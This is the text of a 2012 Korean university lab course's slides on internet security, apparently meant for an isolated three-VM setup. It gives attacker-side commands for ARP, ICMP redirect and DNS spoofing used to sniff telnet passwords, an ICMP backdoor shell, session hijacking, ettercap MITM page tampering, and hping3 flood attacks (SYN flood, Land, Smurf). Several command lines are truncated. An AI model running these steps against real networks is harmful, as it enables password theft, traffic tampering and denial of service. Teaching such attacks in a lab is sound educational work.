인터넷보안 실습 2012년 1학기.

Presentation on theme: "인터넷보안 실습 2012년 1학기."— Presentation transcript:

1 인터넷보안 실습 2012년 1학기

2 환경설정 -1 1. VMPlayer 4.0.3 설치 2. Fedora 12 설치
Vmware tool for Linux 설치하지 않도록 주의 2. Fedora 12 설치 3. gcc 설치: yum install gcc 4. 프로그램 설치 소스설치 : fragrouter Yum 설치: dsniff, hunt tar zxvf fragrouter-….. cd fragrouter… ./configure make yum install dsniff yum install hunt

3 환경설정 -2 5. 컴퓨터를 3대로 복제 반드시 power off 후 복제 내문서에서 폴더 복사
폴더이름 변경: server, client, attacker Vmplayer에서 복사된 컴퓨터 열기 메모리 설정: 256MB 컴퓨터이름 설정

4 실습 8-5. ARP스푸핑 외부 텔넷서버 접속 공격자에게 패스워드 탈취 Ifconfig eth0 promisc
라우터 클라이언트 외부 텔넷서버 접속 공격자에게 패스워드 탈취 공격자 Ifconfig eth0 promisc 터미널 1: ./fragrouter –B1 (패킷릴레이) 터미널 2: dsniff (텔넷 스니핑) 터미널 3: Arpspoof –I eth0 –t (공격대상 IP) (라우터 IP) 공격대상 클라이언트(129)에게 라우터(2)의 맥주소가 공격자컴퓨터(128)의 맥주소라고 허위 광고하는 ARP 메시지를 계속 보냄

5 실습 8-6. ICMP 리다이렉트 외부 텔넷서버 접속 공격자에게 패스워드 탈취
라우터 클라이언트 외부 텔넷서버 접속 공격자에게 패스워드 탈취 공격자 Ifconfig eth0 promisc 터미널 1: ./fragrouter –B1 (패킷릴레이) 터미널 2: dsniff (텔넷 스니핑) 터미널 3: icmp_redir.c 컴파일 ./icmp_redir 외부서버IP (게이트웨이) (공격대상IP) (외부서버IP) (공격자IP) 공격대상 클라이언트(129)에게 특정 외부서버에 접속시에는 공격자컴퓨터(128)가 라우터(2)라고 허위광고하는 ICMP redirect 메시지를 계속 보냄

6 실습 8-8. 스니퍼 찾아보기 Hunt 설치 Hunt 실행 Yum install hunt U) host up test
Start IP addr End IP addr Host up test (arp method) Host up test (ping method) Net ifc promisc test (arp method) 임의의 맥주소 입력 Net ifc promisc test (ping method) 임의의 맥주소 입력

7 실습 9-2. Fake 이용한 스푸핑 텔넷서버 접속 공격자에게 패스워드 탈취
클라이언트 telnet-server 설치 /etc/xinet.d/telnet 설정 변경 Service xinetd start 방화벽 23번 포트 허용 텔넷서버 접속 공격자에게 패스워드 탈취 공격자 Fake 설치 : rpm –Uvh fake-…. (send_arp 명령 가능) 공격자는 서버와 클라이언트에게 ping을 하고 arp –a로 맥주소 확인 공격자는 ifconfig 로 자신의 맥주소 확인 터미널 1: ./fragrouter –B1 (패킷릴레이) 터미널 2: dsniff (텔넷 스니핑) 터미널 3: send_arp 서버IP 공격자MAC 클라이언트IP 클라이언트MAC 공격자의 맥주소를 서버의 맥주소라고 허위 arp 메시지를 보내서 클라이언트를 속임

8 실습 9-3. DNS 스푸핑 외부 웹서버 접속 시도 공격자가 위조된 IP주소 전달 위조된 사이트로 접속
라우터 클라이언트 외부 웹서버 접속 시도 공격자가 위조된 IP주소 전달 위조된 사이트로 접속 공격자 Vi /etc/dsniff/dnsspoof.hosts 위조된 사이트 등록 (예: *.naver.com ) 터미널 1: ./fragrouter –B1 (패킷릴레이) 터미널 2: arpspoof -t (공격자시스템을 라우터라고 광고) 터미널 3: dnsspoof –i eth0 -f /etc/dsniff/dnsspoof.hosts (위조된 IP주소 전달)

9 실습 10-2. SSH 터널링 Putty 설치 SSH 설치 Putty에서 터널링 설정 - 포워드될 포트 추가
윈도우 SSH 서버 페도라 리눅스 Putty 설치 SSH 설치 Putty에서 터널링 설정 - 포워드될 포트 추가 Putty로 SSH 접속 익스플로러에서 인터넷옵션 선택 - 인터넷옵션/연결/LAN설정/고급/프록시설정 익스플로러로 웹사이트 접속 Wireshark로 패킷 분석 - http 패킷이 사용되지 않고 ssh 패킷으로 터널링되어 웹사이트 접속됨

10 실습 10-3. 셸 백도어 은닉채널 Ish 설치 서버에 접속 ./ish 서버주소 Ish 설치 데몬 실행 ./ishd
클라이언트 페도라리눅스 서버 페도라 리눅스 Ish 설치 서버에 접속 ./ish 서버주소 Ish 설치 데몬 실행 ./ishd Wireshark로 패킷분석 - ICMP 패킷을 이용하여 텔넷 이용 가능

11 실습 11-1. Hunt를 이용한 세션하이재킹 1) 미리 텔넷서버 접속. 로그인. 3) 공격자에게 세션 탈취당함
클라이언트 1) 미리 텔넷서버 접속. 로그인. 3) 공격자에게 세션 탈취당함 - 공격자는 로그인 없이 접속 - 클라이언트의 접속을 차단 공격자 2) Hunt 실행 d) daemons rst/arp/sniff/mac a) arp spoof + arp relayer daemon a) add host to host arp spoof 서버 IP 주소 등록 (임의 맥주소) 클라이언트 IP 주소 등록 (임의 맥주소) refresh 간격: 2 x x 최상위메뉴 l) list/watch/reset connections (세션탐지) a) arp/simple hijack (그림 참조) ctrl+c 로 세션 하이재킹

12 실습 11-2. 웹 MITM 공격 클라이언트가 외부 웹서버를 사용할때 내부웹서버를 일부 참조하도록 변조 외부 웹서버 내부웹서버
공격자 클라이언트 (1) 내부웹서버 설정 yum install httpd service httpd start 방화벽에서 http 허용 그림파일을 /var/www/html/에 저장 (2) 공격자 설정 1. Ettercap 설치 yum install ettercap 2. Etterfilter 설정 vi filter.txt (그림 11-19) 3. Etterfilter 컴파일 etterfilter –o filter.ef filter.txt 4. MITM 공격 수행 ettercap –T –q –F filter.ef –M ARP / / // 웹문서의 모든 그림을 내부웹서버에 있는 그림으로 대체 (3) 클라이언트의 웹서핑 웹문서의 그림이 모두 변조되어 출력

13 실습 13-1. Ping of Death Hping3 설치 yum install hping3 터미널: tcpdump –Xx
공격자 서버 Hping3 설치 yum install hping3 터미널: tcpdump –Xx System monitor / resource 동작 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 Ping of death 공격 실시 hping3 -- icmp --rand-source –d flood 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰 호스트윈도우 Ping of death 공격 실시 ping –n 100 –l

14 실습 13-2. SYN Flooding Hping3 설치 yum install hping3 웹서버 설치
공격자 서버 Hping3 설치 yum install hping3 웹서버 설치 yum install httpd 웹서버 시작 service httpd start 방화벽 http 허용 터미널1: tcpdump –Xx System monitor / resource 동작 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 터미널2: netstat –an | grep tcp 관찰 SYN Flooding 공격 실시 hping --rand-source –p 80 –S --flood 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰

15 실습 13-3. Bonk, Boink 공격 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx
공격자 서버 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx System monitor / resource 동작 터미널 1 hping –a id 3200 --O M p 21 -d flood 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 터미널 2 hping –a id 3200 --O M p 21 -d flood 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰

16 실습 13-4. Land 공격 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx
공격자 서버 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx System monitor / resource 동작 hping a icmp --flood 목적지와 송신지 주소를 모두 서버의 주소로 입력 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰

17 실습 13-5. Smurf 공격 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx
공격자 서버 Hping3 설치 yum install hping3 터미널1: tcpdump –Xx System monitor / resource 동작 hping a icmp --flood 전체 네트워크에 공격대상시스템인 서버주소로 ping 응답을 보내도록 명령 공격중 리소스의 변화를 관찰 Tcpdump의 움직임을 관찰 hping a icmp --flood 전체 네트워크에 공격대상시스템인 서버주소로 ping 응답을 보내도록 명령 호스트컴퓨터의 작업관리자/성능을 켜고 CPU및 메모리 사용량 관찰